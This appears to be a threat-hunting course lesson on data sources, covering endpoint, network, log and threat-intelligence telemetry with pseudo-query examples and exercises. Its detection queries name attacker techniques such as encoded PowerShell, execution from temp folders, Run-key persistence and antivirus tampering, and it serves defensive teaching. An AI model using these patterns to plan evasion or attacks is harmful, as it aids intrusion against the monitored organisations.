๐Ÿ“š Learning Objectives

By the end of this lesson, you will be able to:

๐Ÿ” Data Sources Overview

Importance of Data Sources

Effective threat hunting relies heavily on the quality, breadth, and depth of available data sources. The more comprehensive your data collection, the better your chances of detecting sophisticated threats that may have evaded traditional security controls.

๐Ÿ”‘ Key Principles for Data Sources:

  • Completeness: Collect data from all relevant sources
  • Quality: Ensure data accuracy and integrity
  • Timeliness: Real-time or near real-time collection
  • Retention: Maintain historical data for analysis
  • Normalization: Standardize data formats for correlation

Data Source Categories

๐Ÿ–ฅ๏ธ Endpoint Data

  • Process execution logs
  • File system changes
  • Registry modifications
  • Network connections
  • User activity logs

๐ŸŒ Network Data

  • Network flow data (NetFlow)
  • Packet capture (PCAP)
  • DNS query logs
  • Proxy logs
  • Firewall logs

๐Ÿ“‹ System Logs

  • Windows Event Logs
  • Syslog messages
  • Application logs
  • Security logs
  • Authentication logs

๐ŸŽฏ Threat Intelligence

  • IOC feeds
  • Threat actor profiles
  • Malware signatures
  • TTP information
  • Vulnerability data

๐Ÿ–ฅ๏ธ Endpoint Telemetry Data

Process Monitoring

Purpose: Track process creation, execution, and termination events

๐Ÿ“Š Key Data Points:

  • Process name and path
  • Command line arguments
  • Parent process information
  • User and session context
  • Timing information

๐Ÿ” Hunting Use Cases:

  • Detection of suspicious process chains
  • Identification of living-off-the-land techniques
  • Analysis of lateral movement patterns
  • Monitoring of privilege escalation attempts

๐Ÿ’ป Example Queries:

# PowerShell execution detection
ProcessName = "powershell.exe" AND CommandLine CONTAINS "-enc"

# Suspicious parent-child relationships
ParentProcessName = "explorer.exe" AND ProcessName = "cmd.exe"

# Process execution from temp directories
ProcessPath CONTAINS "temp" OR ProcessPath CONTAINS "appdata"
                        

File System Monitoring

Purpose: Track file creation, modification, and deletion events

๐Ÿ“Š Key Data Points:

  • File path and name
  • File size and timestamps
  • File hash values
  • File permissions and attributes
  • Process performing the operation

๐Ÿ” Hunting Use Cases:

  • Detection of malware drops
  • Identification of data exfiltration
  • Monitoring of configuration changes
  • Analysis of persistence mechanisms

๐Ÿ’ป Example Queries:

# Suspicious file extensions
FileName ENDS WITH ".scr" OR FileName ENDS WITH ".pif"

# Files created in system directories
FilePath CONTAINS "system32" AND EventType = "FileCreated"

# Large file transfers
FileSize > 100000000 AND EventType = "FileCreated"
                        

Registry Monitoring

Purpose: Track registry key and value modifications

๐Ÿ“Š Key Data Points:

  • Registry key path
  • Value name and data
  • Operation type (create, modify, delete)
  • Process performing the operation
  • Timestamp of the change

๐Ÿ” Hunting Use Cases:

  • Detection of persistence mechanisms
  • Identification of system configuration changes
  • Monitoring of security software tampering
  • Analysis of privilege escalation attempts

๐Ÿ’ป Example Queries:

# Run key modifications
RegistryPath CONTAINS "Run" AND EventType = "RegistryModified"

# Security software tampering
RegistryPath CONTAINS "antivirus" AND EventType = "RegistryDeleted"

# Suspicious value data
RegistryValue CONTAINS "powershell" OR RegistryValue CONTAINS "cmd"
                        

๐ŸŒ Network Traffic Analysis

Network Flow Data (NetFlow)

Purpose: Analyze network communication patterns and connections

๐Ÿ“Š Key Data Points:

  • Source and destination IP addresses
  • Source and destination ports
  • Protocol information
  • Byte and packet counts
  • Connection duration and timing

๐Ÿ” Hunting Use Cases:

  • Detection of C2 communications
  • Identification of data exfiltration
  • Analysis of lateral movement
  • Monitoring of suspicious connections

DNS Query Analysis

Purpose: Monitor domain name resolution requests

๐Ÿ“Š Key Data Points:

  • Query domain names
  • Query types (A, AAAA, MX, etc.)
  • Response information
  • Client IP addresses
  • Query frequency and patterns

๐Ÿ” Hunting Use Cases:

  • Detection of DNS tunneling
  • Identification of domain generation algorithms
  • Analysis of suspicious domains
  • Monitoring of data exfiltration via DNS

Packet Capture (PCAP)

Purpose: Deep packet inspection for detailed network analysis

๐Ÿ“Š Key Data Points:

  • Full packet payload
  • Protocol headers
  • Application layer data
  • Encrypted traffic metadata
  • Timing and sequence information

๐Ÿ” Hunting Use Cases:

  • Deep analysis of suspicious traffic
  • Identification of custom protocols
  • Analysis of encrypted communications
  • Reconstruction of attack sequences

๐Ÿ“‹ Log Aggregation and Correlation

Centralized Log Management

Effective threat hunting requires centralized collection and normalization of logs from diverse sources.

Windows Event Logs

  • Security Log: Authentication and authorization events
  • System Log: System-level events and errors
  • Application Log: Application-specific events
  • PowerShell Log: PowerShell execution events

Linux/Unix Logs

  • Syslog: System and application messages
  • Auth Log: Authentication events
  • Kernel Log: Kernel-level events
  • Application Logs: Service-specific logs

Network Device Logs

  • Firewall Logs: Traffic filtering and blocking events
  • Router Logs: Routing and network events
  • Switch Logs: Port and VLAN events
  • Proxy Logs: Web traffic and filtering events

Log Correlation Techniques

Time-based Correlation

Correlate events that occur within specific time windows to identify attack sequences.

# Example: Correlate failed logins with successful logins
EventType = "FailedLogin" AND Time > (EventType = "SuccessfulLogin" - 5 minutes)
                        

IP-based Correlation

Track activities from specific IP addresses across multiple data sources.

# Example: Track all activities from suspicious IP
SourceIP = "192.168.1.100" OR DestinationIP = "192.168.1.100"
                        

User-based Correlation

Monitor all activities associated with specific user accounts.

# Example: Track user activities across systems
Username = "admin" OR UserSID = "S-1-5-21-..."
                        

๐ŸŽฏ Threat Intelligence Integration

Types of Threat Intelligence

Indicators of Compromise (IOCs)

  • IP Addresses: Malicious or suspicious IPs
  • Domain Names: Malicious domains and URLs
  • File Hashes: MD5, SHA1, SHA256 of malware
  • Email Addresses: Phishing and spam sources

Tactics, Techniques, and Procedures (TTPs)

  • Attack Patterns: Common attack methodologies
  • Tools and Techniques: Malware and attack tools
  • Infrastructure: C2 servers and domains
  • Behavioral Patterns: Attacker behaviors and habits

Threat Actor Intelligence

  • Attribution: Known threat groups and actors
  • Motivations: Financial, political, espionage
  • Capabilities: Technical skills and resources
  • Targeting: Industries and organizations

Integration Strategies

Automated IOC Matching

Automatically match collected data against known IOCs from threat intelligence feeds.

# Example: Match network connections against malicious IPs
NetworkConnection.SourceIP IN ThreatIntelligence.MaliciousIPs
OR NetworkConnection.DestinationIP IN ThreatIntelligence.MaliciousIPs
                        

Behavioral Pattern Matching

Search for activities that match known attack patterns and techniques.

# Example: Detect living-off-the-land techniques
ProcessName IN ["powershell.exe", "cmd.exe", "wmic.exe"] 
AND CommandLine CONTAINS ThreatIntelligence.SuspiciousCommands
                        

Contextual Enrichment

Enrich hunting queries with contextual information from threat intelligence.

# Example: Search for activities associated with specific threat groups
ThreatIntelligence.AttributedGroup = "APT29" 
AND (ProcessName CONTAINS "sophos" OR RegistryPath CONTAINS "security")
                        

๐Ÿ“Š Data Quality and Normalization

Data Quality Challenges

Ensuring high-quality data is crucial for effective threat hunting. Poor data quality can lead to missed threats or false positives.

Data Inconsistency

Different systems may log the same event in different formats or with different field names.

Solutions:
  • Implement data normalization rules
  • Use standard field naming conventions
  • Create data mapping tables

Missing Data

Some events may not be logged due to configuration issues or system limitations.

Solutions:
  • Implement comprehensive logging policies
  • Use multiple data sources for redundancy
  • Monitor data collection health

Data Volume

Large volumes of data can overwhelm analysis capabilities and slow down hunting activities.

Solutions:
  • Implement data filtering and aggregation
  • Use tiered storage strategies
  • Optimize query performance

Data Normalization Techniques

Field Standardization

Standardize field names and formats across all data sources.

# Standard field names
SourceIP, DestinationIP, SourcePort, DestinationPort
EventTime, EventType, UserName, ProcessName
                        

Time Standardization

Convert all timestamps to a common timezone and format.

# UTC timestamp format
EventTime: "2024-01-15T14:30:25.123Z"
                        

Value Normalization

Normalize values to consistent formats (e.g., lowercase, trimmed strings).

# Normalized values
ProcessName: "powershell.exe" (not "PowerShell.EXE")
UserName: "john.doe" (not "JOHN.DOE")
                        

๐Ÿงช Hands-On Exercise

Exercise: Data Source Assessment and Planning

Objective: Assess available data sources and develop a data collection strategy for threat hunting.

๐Ÿ“‹ Scenarios:

Scenario 1: Small Enterprise Environment

Situation: You're setting up threat hunting for a 100-employee company with basic security infrastructure.

Requirements:
  • Identify available data sources
  • Assess data quality and completeness
  • Recommend data collection improvements
  • Develop data normalization strategy
Scenario 2: Large Enterprise Environment

Situation: You're optimizing threat hunting for a 10,000-employee enterprise with comprehensive security tools.

Requirements:
  • Map all available data sources
  • Identify data gaps and redundancies
  • Optimize data collection and storage
  • Develop correlation strategies
Scenario 3: Cloud-First Environment

Situation: You're implementing threat hunting for a cloud-native organization using AWS, Azure, and SaaS applications.

Requirements:
  • Identify cloud-specific data sources
  • Assess cloud logging capabilities
  • Plan data integration from multiple clouds
  • Address cloud security and compliance

๐Ÿ“„ Deliverables:

  • Data source inventory and assessment
  • Data collection strategy document
  • Data normalization and correlation plan
  • Implementation roadmap with priorities

๐Ÿ“Š Knowledge Check

Question 1: What is the primary purpose of endpoint telemetry data in threat hunting?

Question 2: Which data source is most effective for detecting DNS tunneling attacks?

Question 3: What is the main challenge with data normalization in threat hunting?

๐Ÿ”— Additional Resources